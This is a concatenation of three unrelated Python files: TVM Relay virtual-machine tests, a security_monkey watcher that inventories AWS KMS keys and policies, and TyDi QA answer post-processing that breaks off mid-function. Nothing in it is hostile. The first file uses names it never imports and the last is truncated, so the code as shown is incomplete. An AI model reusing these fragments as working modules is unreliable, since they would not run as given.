from tvm.relay.prelude import Prelude
import pytest
def check_result(args, expected_result, mod=None):
    """Evaluate ``mod``'s main function on ``args`` with the Relay VM and
    compare against ``expected_result`` on every enabled target/context.

    Parameters
    ----------
    args: list of Expr
        The arguments to supply the expr.
    expected_result:
        The expected result of running the expression.
    """
    for tgt, dev in ctx_list():
        executor = relay.create_executor('vm', ctx=dev, target=tgt, mod=mod)
        actual = executor.evaluate()(*args)
        tvm.testing.assert_allclose(expected_result, actual.asnumpy())
def veval(f, *args, ctx=tvm.cpu(), target="llvm"):
    """Compile ``f`` with the Relay VM compiler and invoke "main" on ``args``.

    Parameters
    ----------
    f: relay.Expr or relay.Module
        An expression (wrapped into a fresh module as "main") or a module.
    ctx: TVMContext
        Context to initialise the VM on (previously accepted but ignored:
        the VM was always initialised on ``tvm.cpu()``; now honoured, with
        the same default).
    target: str
        Compilation target.

    Returns
    -------
    The value produced by invoking "main".
    """
    # Normalise the expression case to a module so a single
    # compile/init/invoke path serves both branches (the original
    # duplicated it verbatim).
    if isinstance(f, relay.Expr):
        mod = relay.Module()
        mod["main"] = f
    else:
        assert isinstance(f, relay.Module), "expected expression or module"
        mod = f
    compiler = relay.vm.VMCompiler()
    vm = compiler.compile(mod, target)
    vm.init(ctx)
    return vm.invoke("main", *args)
def vmobj_to_list(o):
    """Recursively flatten a VM object into a flat Python list of values."""
    if isinstance(o, tvm.relay.backend.vmobj.TensorObject):
        return [o.asnumpy().tolist()]
    if isinstance(o, tvm.relay.backend.vmobj.DatatypeObject):
        flattened = []
        for field in o:
            flattened += vmobj_to_list(field)
        return flattened
    raise RuntimeError("Unknown object type: %s" % type(o))
def test_split():
    """Split a 12-vector into 3 equal parts and compare with numpy."""
    inp = relay.var('x', shape=(12,))
    parts = relay.split(inp, 3, axis=0).astuple()
    func = relay.Function([inp], parts)
    data = np.random.rand(12,).astype('float32')
    actual = veval(func, data)
    for idx, ref in enumerate(np.split(data, 3, axis=0)):
        tvm.testing.assert_allclose(actual[idx].asnumpy(), ref)
def test_split_no_fuse():
    """Split, then concatenate the first chunk with fusion disabled."""
    inp = relay.var('x', shape=(12,))
    parts = relay.split(inp, 3, axis=0).astuple()
    out = relay.concatenate([relay.TupleGetItem(parts, 0)], axis=0)
    out = relay.annotation.stop_fusion(out)
    func = relay.Function([inp], out)
    data = np.random.rand(12,).astype('float32')
    actual = veval(func, data)
    tvm.testing.assert_allclose(actual.asnumpy(), np.split(data, 3, axis=0)[0])
def test_id():
    """The identity function round-trips a float64 tensor unchanged."""
    inp = relay.var('x', shape=(10, 10), dtype='float64')
    mod = relay.Module()
    mod["main"] = relay.Function([inp], inp)
    data = np.random.rand(10, 10).astype('float64')
    check_result([data], data, mod=mod)
def test_op():
    """x + x doubles the input tensor."""
    inp = relay.var('x', shape=(10, 10))
    mod = relay.Module()
    mod["main"] = relay.Function([inp], inp + inp)
    data = np.random.rand(10, 10).astype('float32')
    check_result([data], 2 * data, mod=mod)
def any(x):
    # Reduce a tensor to a single scalar by flattening and taking the min
    # over all elements; used by the tests below as an "all elements true"
    # style predicate.
    # NOTE(review): shadows the builtin ``any`` in this module; kept as-is
    # because the tests below call it by this name.
    x = relay.op.nn.batch_flatten(x)
    return relay.op.min(x, axis=[0, 1])
def test_cond():
    """Elementwise equality reduced to one boolean via ``any``."""
    lhs = relay.var('x', shape=(10, 10))
    rhs = relay.var('y', shape=(10, 10))
    mod = relay.Module()
    mod["main"] = relay.Function([lhs, rhs], any(relay.op.equal(lhs, rhs)))
    lhs_data = np.random.rand(10, 10).astype('float32')
    rhs_data = np.random.rand(10, 10).astype('float32')
    # identical tensors compare equal
    check_result([lhs_data, lhs_data], True, mod=mod)
    # different tensors do not
    check_result([lhs_data, rhs_data], False, mod=mod)
def test_simple_if():
    """If all elements compare equal return x, otherwise y."""
    lhs = relay.var('x', shape=(10, 10))
    rhs = relay.var('y', shape=(10, 10))
    body = relay.If(any(relay.op.equal(lhs, rhs)), lhs, rhs)
    mod = relay.Module()
    mod["main"] = relay.Function([lhs, rhs], body)
    lhs_data = np.random.rand(10, 10).astype('float32')
    rhs_data = np.random.rand(10, 10).astype('float32')
    check_result([lhs_data, lhs_data], lhs_data, mod=mod)  # same -> x
    check_result([lhs_data, rhs_data], rhs_data, mod=mod)  # diff -> y
def test_simple_call():
    """A global function that simply returns its int32 argument."""
    mod = relay.module.Module({})
    sum_up = relay.GlobalVar('sum_up')
    arg = relay.var('i', shape=[], dtype='int32')
    sb = ScopeBuilder()
    sb.ret(arg)
    mod[sum_up] = relay.Function([arg], sb.get(),
                                 ret_type=relay.TensorType([], 'int32'))
    data = np.array(0, dtype='int32')
    outer = relay.var('iarg', shape=[], dtype='int32')
    mod["main"] = relay.Function([outer], sum_up(outer))
    check_result([data], data, mod=mod)
def test_count_loop():
    """Recursive countdown function, evaluated at i = 0 (base case)."""
    mod = relay.module.Module({})
    sum_up = relay.GlobalVar('sum_up')
    i = relay.var('i', shape=[], dtype='int32')
    sb = ScopeBuilder()
    with sb.if_scope(relay.equal(i, relay.const(0, dtype='int32'))):
        sb.ret(i)
    with sb.else_scope():
        one_less = relay.subtract(i, relay.const(1, dtype='int32'))
        sb.ret(relay.add(relay.Call(sum_up, [one_less]), i))
    mod[sum_up] = relay.Function([i], sb.get(),
                                 ret_type=relay.TensorType([], 'int32'))
    data = np.array(0, dtype='int32')
    outer = relay.var('i', shape=[], dtype='int32')
    mod["main"] = relay.Function([outer], sum_up(outer))
    result = veval(mod, data)
    tvm.testing.assert_allclose(result.asnumpy(), data)
    check_result([data], data, mod=mod)
def test_sum_loop():
    """Tail-recursive accumulating sum, evaluated at a loop bound of 0."""
    mod = relay.module.Module({})
    sum_up = relay.GlobalVar('sum_up')
    i = relay.var('i', shape=[], dtype='int32')
    accum = relay.var('accum', shape=[], dtype='int32')
    sb = ScopeBuilder()
    with sb.if_scope(relay.equal(i, relay.const(0, 'int32'))):
        sb.ret(accum)
    with sb.else_scope():
        one_less = relay.subtract(i, relay.const(1, 'int32'))
        sb.ret(relay.Call(sum_up, [one_less, relay.add(accum, i)]))
    mod[sum_up] = relay.Function([i, accum], sb.get())
    loop_bound = 0
    i_data = np.array(loop_bound, dtype='int32')
    accum_data = np.array(0, dtype='int32')
    outer_i = relay.var('i', shape=[], dtype='int32')
    outer_accum = relay.var('accum', shape=[], dtype='int32')
    mod["main"] = relay.Function([outer_i, outer_accum],
                                 sum_up(outer_i, outer_accum))
    check_result([i_data, accum_data], sum(range(1, loop_bound + 1)), mod=mod)
def test_tuple_fst():
    """Project the first element out of a tuple argument."""
    ttype = relay.TupleType([relay.TensorType((1,)), relay.TensorType((10,))])
    tup = relay.var('tup', type_annotation=ttype)
    mod = relay.Module()
    mod["main"] = relay.Function([tup], relay.TupleGetItem(tup, 0))
    # NOTE(review): fst has 41 elements while the declared type is (1,) —
    # preserved from the original; confirm whether intentional.
    fst = np.random.rand(41).astype('float32')
    snd = np.random.rand(10).astype('float32')
    check_result([(fst, snd)], fst, mod=mod)
def test_tuple_second():
    """Project the second element out of a tuple argument."""
    ttype = relay.TupleType([relay.TensorType((1,)), relay.TensorType((10,))])
    tup = relay.var('tup', type_annotation=ttype)
    mod = relay.Module()
    mod["main"] = relay.Function([tup], relay.TupleGetItem(tup, 1))
    fst = np.random.rand(41).astype('float32')
    snd = np.random.rand(10).astype('float32')
    check_result([(fst, snd)], snd, mod=mod)
def test_list_constructor():
    """Build [3, 2, 1] from Prelude cons cells and flatten it."""
    mod = relay.Module()
    prelude = Prelude(mod)
    lst = prelude.cons(relay.const(1), prelude.nil())
    lst = prelude.cons(relay.const(2), lst)
    lst = prelude.cons(relay.const(3), lst)
    mod["main"] = relay.Function([], lst)
    result = veval(mod)
    # a cons cell is a two-field datatype: (head, tail)
    assert len(result) == 2
    assert len(result[1]) == 2
    tvm.testing.assert_allclose(vmobj_to_list(result), np.array([3, 2, 1]))
def test_let_tensor():
    """Let-bind a tensor, then add a constant to the bound value."""
    sb = relay.ScopeBuilder()
    shape = (1,)
    x = relay.var('x', shape=shape, dtype='float32')
    bound = sb.let(relay.var('x1', shape=shape, dtype='float32'), x)
    sb.ret(bound + relay.const(42.0, 'float32'))
    mod = relay.Module()
    mod["main"] = relay.Function([x], sb.get())
    data = np.random.rand(*shape).astype('float32')
    check_result([data], data + 42.0, mod=mod)
def test_let_scalar():
    """Let-bind a scalar, then add a constant to the bound value."""
    sb = relay.ScopeBuilder()
    x = relay.var('x', 'float32')
    bound = sb.let('x1', x)
    sb.ret(bound + relay.const(42.0, 'float32'))
    mod = relay.Module()
    mod["main"] = relay.Function([x], sb.get())
    data = np.array(np.random.rand()).astype('float32')
    check_result([data], data + 42.0, mod=mod)
def test_compose():
    """compose(add_one, add_one) applied to x yields x + 2."""
    mod = relay.Module()
    prelude = Prelude(mod)
    # add_one = fun x -> x + 1
    sb = relay.ScopeBuilder()
    x = relay.var('x', 'float32')
    bound = sb.let('x1', x)
    sb.ret(bound + relay.const(1.0, 'float32'))
    add_one = relay.GlobalVar("add_one")
    add_one_func = relay.Function([x], sb.get())
    # add_two = compose(add_one, add_one)
    sb = relay.ScopeBuilder()
    y = relay.var('y', 'float32')
    add_two = sb.let('add_two', prelude.compose(add_one_func, add_one_func))
    sb.ret(add_two(y))
    mod[add_one] = add_one_func
    mod["main"] = relay.Function([y], sb.get())
    data = np.array(np.random.rand()).astype('float32')
    result = veval(mod, [data])
    tvm.testing.assert_allclose(result.asnumpy(), data + 2.0)
def test_list_hd():
    """hd of the list [3, 2, 1] is 3."""
    mod = relay.Module()
    prelude = Prelude(mod)
    lst = prelude.cons(relay.const(1), prelude.nil())
    lst = prelude.cons(relay.const(2), lst)
    lst = prelude.cons(relay.const(3), lst)
    mod["main"] = relay.Function([], prelude.hd(lst))
    result = veval(mod)
    tvm.testing.assert_allclose(result.asnumpy(), 3)
@pytest.mark.xfail
def test_list_tl_empty_list():
    """tl of the empty list fails at runtime (expected failure)."""
    mod = relay.Module()
    prelude = Prelude(mod)
    mod["main"] = relay.Function([], prelude.tl(prelude.nil()))
    result = veval(mod)
    print(result)
def test_list_tl():
    """tl of [3, 2, 1] is [2, 1]."""
    mod = relay.Module()
    prelude = Prelude(mod)
    lst = prelude.cons(relay.const(1), prelude.nil())
    lst = prelude.cons(relay.const(2), lst)
    lst = prelude.cons(relay.const(3), lst)
    mod["main"] = relay.Function([], prelude.tl(lst))
    result = veval(mod)
    tvm.testing.assert_allclose(vmobj_to_list(result), np.array([2, 1]))
def test_list_nth():
    """nth(l, i) returns the i-th element for every index of a 10-long list.

    Bug fix: the original reused ``i`` as the inner (list-building) loop
    variable, which clobbered the index under test — ``reversed(expected)``
    ends at 0, so ``nth`` was only ever checked at index 0.  The inner loop
    now uses its own variable ``v``.
    """
    expected = list(range(10))
    for i in range(len(expected)):
        mod = relay.Module()
        p = Prelude(mod)
        nil = p.nil
        cons = p.cons
        nth = p.nth
        l = nil()
        # build the list back-to-front so it reads as ``expected``
        for v in reversed(expected):
            l = cons(relay.const(v), l)
        f = relay.Function([], nth(l, relay.const(i)))
        mod["main"] = f
        result = veval(mod)
        tvm.testing.assert_allclose(result.asnumpy(), expected[i])
def test_list_update():
    """Build a zero-filled list then update every slot to its index value."""
    expected = list(range(10))
    mod = relay.Module()
    prelude = Prelude(mod)
    lst = prelude.nil()
    # zero-initialised list of the right length
    for _ in expected:
        lst = prelude.cons(relay.const(0), lst)
    # write every position
    for idx, val in enumerate(expected):
        lst = prelude.update(lst, relay.const(idx), relay.const(val))
    mod["main"] = relay.Function([], lst)
    result = veval(mod)
    tvm.testing.assert_allclose(vmobj_to_list(result), np.array(expected))
def test_list_length():
    """length of a 10-element list is 10."""
    mod = relay.Module()
    prelude = Prelude(mod)
    lst = prelude.nil()
    for _ in range(10):
        lst = prelude.cons(relay.const(0), lst)
    mod["main"] = relay.Function([], prelude.length(lst))
    result = veval(mod)
    tvm.testing.assert_allclose(result.asnumpy(), 10)
def test_list_map():
    """map(+1) over [2, 1] yields [3, 2]."""
    mod = relay.Module()
    prelude = Prelude(mod)
    x = relay.var('x', 'int32')
    add_one_func = relay.Function([x], relay.const(1) + x)
    lst = prelude.cons(relay.const(2),
                       prelude.cons(relay.const(1), prelude.nil()))
    mod["main"] = relay.Function([], prelude.map(add_one_func, lst))
    result = veval(mod)
    tvm.testing.assert_allclose(vmobj_to_list(result), np.array([3, 2]))
def test_list_foldl():
    """foldl with a reverse-and-duplicate step over [1, 2, 3]."""
    mod = relay.Module()
    prelude = Prelude(mod)
    acc = relay.var("y")
    elem = relay.var("x")
    rev_dup = relay.Function([acc, elem],
                             prelude.cons(elem, prelude.cons(elem, acc)))
    lst = prelude.cons(relay.const(1),
                       prelude.cons(relay.const(2),
                                    prelude.cons(relay.const(3),
                                                 prelude.nil())))
    mod["main"] = relay.Function([], prelude.foldl(rev_dup, prelude.nil(), lst))
    result = veval(mod)
    tvm.testing.assert_allclose(vmobj_to_list(result),
                                np.array([3, 3, 2, 2, 1, 1]))
def test_list_foldr():
    """foldr with cons as the step reproduces the input list [1, 2, 3]."""
    mod = relay.Module()
    prelude = Prelude(mod)
    elem = relay.var("x")
    acc = relay.var("y")
    identity_step = relay.Function([elem, acc], prelude.cons(elem, acc))
    lst = prelude.cons(relay.const(1),
                       prelude.cons(relay.const(2),
                                    prelude.cons(relay.const(3),
                                                 prelude.nil())))
    mod["main"] = relay.Function([],
                                 prelude.foldr(identity_step, prelude.nil(), lst))
    result = veval(mod)
    tvm.testing.assert_allclose(vmobj_to_list(result), np.array([1, 2, 3]))
def test_list_sum():
    """sum of [1, 2, 3] is 6."""
    mod = relay.Module()
    prelude = Prelude(mod)
    lst = prelude.cons(relay.const(1),
                       prelude.cons(relay.const(2),
                                    prelude.cons(relay.const(3),
                                                 prelude.nil())))
    mod["main"] = relay.Function([], prelude.sum(lst))
    result = veval(mod)
    tvm.testing.assert_allclose(result.asnumpy(), 6)
def test_list_filter():
    """filter(> 1) over [1, 3, 1, 5, 1] keeps [3, 5]."""
    mod = relay.Module()
    prelude = Prelude(mod)
    x = relay.var("x", 'int32')
    greater_than_one = relay.Function([x], x > relay.const(1))
    # prepend in reverse so the resulting list reads [1, 3, 1, 5, 1]
    lst = prelude.nil()
    for value in [1, 5, 1, 3, 1]:
        lst = prelude.cons(relay.const(value), lst)
    mod["main"] = relay.Function([], prelude.filter(greater_than_one, lst))
    result = veval(mod)
    tvm.testing.assert_allclose(vmobj_to_list(result), np.array([3, 5]))
def test_closure():
    """A closure capturing y=1, applied to x=2, yields 3."""
    x = relay.var('x', shape=())
    y = relay.var('y', shape=())
    inner = relay.Function([x], x + y)
    outer = relay.Function([y], inner)
    main = outer(relay.const(1.0))(relay.const(2.0))
    res = veval(main)
    tvm.testing.assert_allclose(res.asnumpy(), 3.0)
def test_add_op_scalar():
    """Scalar addition: fn (x, y) { return x + y; }."""
    mod = relay.Module()
    x = relay.var('x', shape=())
    y = relay.var('y', shape=())
    mod["main"] = relay.Function([x, y], relay.op.add(x, y))
    lhs = np.array(10.0, dtype='float32')
    rhs = np.array(1.0, dtype='float32')
    check_result([lhs, rhs], lhs + rhs, mod=mod)
def test_add_op_tensor():
    """Tensor addition: fn (x, y) { return x + y; }."""
    mod = relay.Module()
    x = relay.var('x', shape=(10, 5))
    y = relay.var('y', shape=(10, 5))
    mod["main"] = relay.Function([x, y], relay.op.add(x, y))
    lhs = np.random.rand(10, 5).astype('float32')
    rhs = np.random.rand(10, 5).astype('float32')
    check_result([lhs, rhs], lhs + rhs, mod=mod)
def test_add_op_broadcast():
    """Broadcasting addition: (10, 5) + (1, 5)."""
    mod = relay.Module()
    x = relay.var('x', shape=(10, 5))
    y = relay.var('y', shape=(1, 5))
    mod["main"] = relay.Function([x, y], relay.op.add(x, y))
    lhs = np.random.rand(10, 5).astype('float32')
    rhs = np.random.rand(1, 5).astype('float32')
    check_result([lhs, rhs], lhs + rhs, mod=mod)
if __name__ == "__main__":
    # Run every test exactly once.  The original call list invoked
    # test_let_tensor and test_let_scalar twice (accidental duplication).
    test_id()
    test_op()
    test_cond()
    test_simple_if()
    test_simple_call()
    test_count_loop()
    test_sum_loop()
    test_tuple_fst()
    test_tuple_second()
    test_let_scalar()
    test_let_tensor()
    test_split()
    test_split_no_fuse()
    test_list_constructor()
    test_compose()
    test_list_hd()
    test_list_tl_empty_list()
    test_list_tl()
    test_list_nth()
    test_list_update()
    test_list_length()
    test_list_map()
    test_list_foldl()
    test_list_foldr()
    test_list_sum()
    test_list_filter()
    test_closure()
    test_add_op_scalar()
    test_add_op_tensor()
    test_add_op_broadcast()
| |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. module: security_monkey.watchers.kms
:platform: Unix
.. version:: $$VERSION$$
.. moduleauthor:: Alex Cline <alex.cline@gmail.com> @alex.cline
"""
from security_monkey.decorators import record_exception
from security_monkey.decorators import iter_account_region
from security_monkey.watcher import Watcher
from security_monkey.watcher import ChangeItem
from security_monkey.constants import TROUBLE_REGIONS
from security_monkey.exceptions import BotoConnectionIssue
from security_monkey import app, ARN_PREFIX
from dateutil.tz import tzutc
import json
from botocore.exceptions import ClientError
class KMS(Watcher):
    # Watcher that enumerates KMS master keys per account/region and records
    # each key's metadata, aliases, grants, policies and rotation status.
    index = 'kms'
    i_am_singular = 'KMS Master Key'
    i_am_plural = 'KMS Master Keys'

    @record_exception()
    def connect_to_kms(self, **kwargs):
        # Build a boto3 KMS client for kwargs['account_name'] in
        # kwargs['region'], assuming kwargs['assumed_role'].
        from security_monkey.common.sts_connect import connect
        return connect(kwargs['account_name'], 'boto3.kms.client', region=kwargs['region'],
                       assumed_role=kwargs['assumed_role'])

    def paged_wrap_aws_rate_limited_call(self, type, func, *args, **nargs):
        # Follow the "Marker"/"NextMarker" pagination protocol, collecting
        # the entries found under response[type] across all pages.
        # NOTE(review): the ``type`` parameter shadows the builtin.
        marker = None
        all_results = []
        while True:
            if marker is None:
                response = self.wrap_aws_rate_limited_call(func, *args, **nargs)
            else:
                nargs["Marker"] = marker
                response = self.wrap_aws_rate_limited_call(func, *args, **nargs)
            all_results.extend(response.get(type))
            marker = response.get("NextMarker")
            if marker is None:
                break
        return all_results

    @record_exception()
    def list_keys(self, kms, **kwargs):
        # All keys in the account/region (paged under "Keys").
        all_keys = self.paged_wrap_aws_rate_limited_call(
            "Keys",
            kms.list_keys
        )
        return all_keys

    @record_exception()
    def list_aliases(self, kms, **kwargs):
        # All aliases in the account/region (paged under "Aliases").
        all_aliases = self.paged_wrap_aws_rate_limited_call(
            "Aliases",
            kms.list_aliases
        )
        return all_aliases

    @record_exception()
    def list_grants(self, kms, key_id, **kwargs):
        # All grants attached to one key (paged under "Grants").
        all_grants = self.paged_wrap_aws_rate_limited_call(
            "Grants",
            kms.list_grants,
            KeyId=key_id
        )
        return all_grants

    @record_exception()
    def describe_key(self, kms, key_id, **kwargs):
        # Return the key's metadata.  On AccessDenied a stub config marked
        # 'Error': 'Unauthorized' is returned so the caller can still record
        # the key; any other client error propagates.
        try:
            response = self.wrap_aws_rate_limited_call(
                kms.describe_key,
                KeyId=key_id
            )
        except ClientError as e:
            if e.response.get("Error", {}).get("Code") != "AccessDeniedException":
                raise
            arn = ARN_PREFIX + ":kms:{}:{}:key/{}".format(kwargs['region'],
                                                          kwargs['account_name'],
                                                          key_id)
            return {
                'Error': 'Unauthorized',
                'Arn': arn,
                "AWSAccountId": kwargs['account_name'],
                'Policies': [],
                'Grants': []
            }
        return response.get("KeyMetadata")

    @record_exception()
    def list_key_policies(self, kms, key_id, alias, **kwargs):
        # Names of the policies attached to a key; AWS-owned keys get a
        # hard-coded ['default'] without an API call.
        policy_names = []
        if alias.startswith('alias/aws/'):
            # AWS-owned KMS keys don't have a policy we can see. Setting a default here saves an API request.
            app.logger.debug("{} {}({}) is an AWS supplied KMS key, overriding to [default] for policy".format(self.i_am_singular, alias, key_id))
            policy_names = ['default']
        else:
            try:
                policy_names = self.paged_wrap_aws_rate_limited_call(
                    "PolicyNames",
                    kms.list_key_policies,
                    KeyId=key_id
                )
            except ClientError as e:
                # NOTE(review): re-raised unchanged — this try/except adds no
                # behaviour and could be removed.
                raise
        return policy_names

    @record_exception()
    def get_key_policy(self, kms, key_id, policy_name, alias, **kwargs):
        # Fetch one named policy document and parse its JSON body.
        policy = self.wrap_aws_rate_limited_call(
            kms.get_key_policy,
            KeyId=key_id,
            PolicyName=policy_name
        )
        return json.loads(policy.get("Policy"))

    @record_exception()
    def get_key_rotation_status(self, kms, key_id, alias, **kwargs):
        # Rotation flag for a key; AWS-owned keys are hard-coded to True
        # without an API call.
        rotation_status = None
        if alias.startswith('alias/aws/'):
            # AWS-owned KMS keys don't have a rotation status we can see. Setting a default here saves an API request.
            app.logger.debug("{} {}({}) is an AWS supplied KMS key, overriding to True for rotation state".format(self.i_am_singular, alias, key_id))
            rotation_status = True
        else:
            rotation_status = self.wrap_aws_rate_limited_call(
                kms.get_key_rotation_status,
                KeyId=key_id
            ).get("KeyRotationEnabled")
        return rotation_status

    def __init__(self, accounts=None, debug=False):
        super(KMS, self).__init__(accounts=accounts, debug=debug)

    def slurp(self):
        """
        :returns: item_list - list of KMS keys.
        :returns: exception_map - A dict where the keys are a tuple containing the
            location of the exception and the value is the actual exception
        """
        self.prep_for_slurp()

        @iter_account_region(index=self.index, accounts=self.accounts, service_name='kms')
        def slurp_items(**kwargs):
            # Invoked once per (account, region) by the decorator; returns
            # the collected items and the per-location exception map.
            item_list = []
            exception_map = {}
            kwargs['exception_map'] = exception_map
            app.logger.debug("Checking {}/{}/{}".format(self.index,
                                                        kwargs['account_name'],
                                                        kwargs['region']))
            kms = self.connect_to_kms(**kwargs)
            if kms:
                # First, we'll get all the keys and aliases
                keys = self.list_keys(kms, **kwargs)
                # If we don't have any keys, don't bother getting aliases
                if keys:
                    app.logger.debug("Found {} {}.".format(len(keys), self.i_am_plural))
                    aliases = self.list_aliases(kms, **kwargs)
                    app.logger.debug("Found {} {} and {} Aliases.".format(len(keys), self.i_am_plural, len(aliases)))
                    # Then, we'll get info about each key
                    for key in keys:
                        policies = []
                        key_id = key.get("KeyId")
                        # get the key's config object and grants
                        config = self.describe_key(kms, key_id, **kwargs)
                        if config:
                            # filter the list of all aliases and save them with the key they're for
                            config[u"Aliases"] = [a.get("AliasName") for a in aliases if a.get("TargetKeyId") == key_id]
                            if config[u"Aliases"]:
                                alias = config[u"Aliases"][0]
                                alias = alias[len('alias/'):]  # Turn alias/name into just name
                            else:
                                alias = "[No Aliases]"
                            name = "{alias} ({key_id})".format(alias=alias, key_id=key_id)
                            # Grants/policies/rotation are only fetched for
                            # keys we were authorized to describe.
                            if config.get('Error') is None:
                                grants = self.list_grants(kms, key_id, **kwargs)
                                policy_names = self.list_key_policies(kms, key_id, alias, **kwargs)
                                rotation_status = self.get_key_rotation_status(kms, key_id, alias, **kwargs)
                                if policy_names:
                                    for policy_name in policy_names:
                                        policy = self.get_key_policy(kms, key_id, policy_name, alias, **kwargs)
                                        policies.append(policy)
                                # Convert the datetime objects into ISO formatted strings in UTC
                                if config.get('CreationDate'):
                                    config.update({ 'CreationDate': config.get('CreationDate').astimezone(tzutc()).isoformat() })
                                if config.get('DeletionDate'):
                                    config.update({ 'DeletionDate': config.get('DeletionDate').astimezone(tzutc()).isoformat() })
                                if grants:
                                    for grant in grants:
                                        if grant.get("CreationDate"):
                                            grant.update({ 'CreationDate': grant.get('CreationDate').astimezone(tzutc()).isoformat() })
                                config[u"Policies"] = policies
                                config[u"Grants"] = grants
                                config[u"KeyRotationEnabled"] = rotation_status
                            item = KMSMasterKey(region=kwargs['region'], account=kwargs['account_name'], name=name,
                                                arn=config.get('Arn'), config=dict(config), source_watcher=self)
                            item_list.append(item)
            return item_list, exception_map
        return slurp_items()
class KMSMasterKey(ChangeItem):
    """ChangeItem wrapper recording one KMS master key's configuration."""

    def __init__(self, region=None, account=None, name=None, arn=None, config=None, source_watcher=None):
        super(KMSMasterKey, self).__init__(
            index=KMS.index,
            region=region,
            account=account,
            name=name,
            arn=arn,
            new_config=config or {},
            source_watcher=source_watcher)
| |
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Postprocesses outputs from a NN compute graph into well-formed answers.
This module has only light dependencies on Tensorflow (5-10 lines in
`compute_pred_dict` and `compute_predictions`).
"""
import collections
import json
from absl import logging
from language.canine.tydiqa import data
import numpy as np
import tensorflow.compat.v1 as tf
class ScoreSummary(object):
  """Holds the span/CLS scores and final predicted label for one example."""

  def __init__(self):
    # All fields start unset; they are filled in during post-processing
    # (see `compute_predictions`).
    for field in ("predicted_label", "minimal_span_score",
                  "cls_token_score", "answer_type_logits"):
      setattr(self, field, None)
def read_candidates_from_one_split(file_obj):
  """Read candidates from a single jsonl file.

  Args:
    file_obj: iterable of JSON lines, each carrying an "example_id" and a
      "passage_answer_candidates" entry.

  Returns:
    Dict mapping example_id to its passage_answer_candidates.
  """
  return {
      record["example_id"]: record["passage_answer_candidates"]
      for record in map(json.loads, file_obj)
  }
def get_best_indexes(logits, n_best_size):
  """Get the indexes of the ``n_best_size`` highest logits.

  Index 0 is excluded from consideration (it appears to be reserved for the
  [CLS] position — `compute_predictions` reads logits[0] as the CLS score).

  Args:
    logits: sequence of scores.
    n_best_size: maximum number of indexes to return.

  Returns:
    A list of at most ``n_best_size`` indexes into ``logits``, ordered by
    descending score.
  """
  index_and_score = sorted(
      enumerate(logits[1:], 1), key=lambda x: x[1], reverse=True)
  # Slice instead of the original loop-with-break; max(..., 0) keeps the
  # original behaviour (empty result) for a non-positive n_best_size.
  return [index for index, _ in index_and_score[:max(n_best_size, 0)]]
# IMPROVE ME (PULL REQUESTS WELCOME): This takes more than half the runtime and
# just runs on CPU; we could speed this up by parallelizing it (or moving it to
# Apache Beam).
def compute_predictions(eval_example, candidate_beam, max_answer_length):
  """Converts an eval_example into a `ScoreSummary` object for evaluation.

  This performs python post-processing (after running NN graph in tensorflow)
  in order to get the best answer.

  Args:
    eval_example: `EvalExample` instance with features, results.
    candidate_beam: see FLAGS.candidate_beam.
    max_answer_length: see FLAGS.max_answer_length.

  Returns:
    A `ScoreSummary` or `None` if no passage prediction could be found.
  """
  predictions = []
  n_best_size = candidate_beam
  # Bail out when results are missing or misaligned with the features.
  if not eval_example.results:
    return None
  if len(eval_example.features) != len(eval_example.results):
    logging.warning(
        "ERROR: len(features)=%s, but len(results)=%d for eval_example %s",
        len(eval_example.features), len(eval_example.results),
        eval_example.example_id)
    return None
  for unique_id, result in eval_example.results.items():
    if unique_id not in eval_example.features:
      logging.warning("No feature found with unique_id: %s", unique_id)
      return None
    # Byte offsets mapping each wordpiece back into the plaintext; -1 marks
    # dummy tokens.
    wp_start_offset = (
        eval_example.features[unique_id]["wp_start_offset"].int64_list.value)
    wp_end_offset = (
        eval_example.features[unique_id]["wp_end_offset"].int64_list.value)
    language_id = (
        eval_example.features[unique_id]["language_id"].int64_list.value[0])
    language_name = data.Language(language_id).name.lower()
    # Consider only the top-n start/end positions; position 0 holds the
    # [CLS] logit and is read separately below.
    start_indexes = get_best_indexes(result["start_logits"], n_best_size)
    end_indexes = get_best_indexes(result["end_logits"], n_best_size)
    cls_token_score = result["start_logits"][0] + result["end_logits"][0]
    for start_index in start_indexes:
      for end_index in end_indexes:
        # Skip inverted spans.
        if end_index < start_index:
          continue
        # This means these are dummy tokens (like separators).
        if wp_start_offset[start_index] == -1:
          continue
        if wp_end_offset[end_index] == -1:
          continue
        # Skip spans longer than the configured maximum.
        length = end_index - start_index + 1
        if length > max_answer_length:
          continue
        summary = ScoreSummary()
        summary.minimal_span_score = (
            result["start_logits"][start_index] +
            result["end_logits"][end_index])
        summary.cls_token_score = cls_token_score
        summary.answer_type_logits = result["answer_type_logits"]
        start_offset = wp_start_offset[start_index]
        end_offset = wp_end_offset[end_index] + 1
        # Span logits minus the [CLS] logits seems to be close to the best.
        score = summary.minimal_span_score - summary.cls_token_score
        predictions.append(
            (score, summary, language_name, start_offset, end_offset))
  if not predictions:
    logging.warning("No predictions for eval_example %s",
                    eval_example.example_id)
    return None
  # Keep only the single highest-scoring span.
  score, summary, language_name, start_span, end_span = max(
      predictions, key=lambda x: x[0])
  minimal_span = Span(start_span, end_span)
  # Find the passage candidate that fully contains the chosen span;
  # fall back to candidate 0 if none does (for/else).
  passage_span_index = 0
  for c_ind, c in enumerate(eval_example.candidates):
    start = minimal_span.start_byte_offset
    end = minimal_span.end_byte_offset
    if c["plaintext_start_byte"] <= start and c["plaintext_end_byte"] >= end:
      passage_span_index = c_ind
      break
  else:
    logging.warning("No passage predicted for eval_example %s. Choosing first.",
                    eval_example.example_id)
  summary.predicted_label = {
      "example_id": eval_example.example_id,
      "language": language_name,
      "passage_answer_index": passage_span_index,
      "passage_answer_score": score,
      "minimal_answer": {
          "start_byte_offset": minimal_span.start_byte_offset,
          "end_byte_offset": minimal_span.end_byte_offset
      },
      "minimal_answer_score": score,
      "yes_no_answer": "NONE"
  }
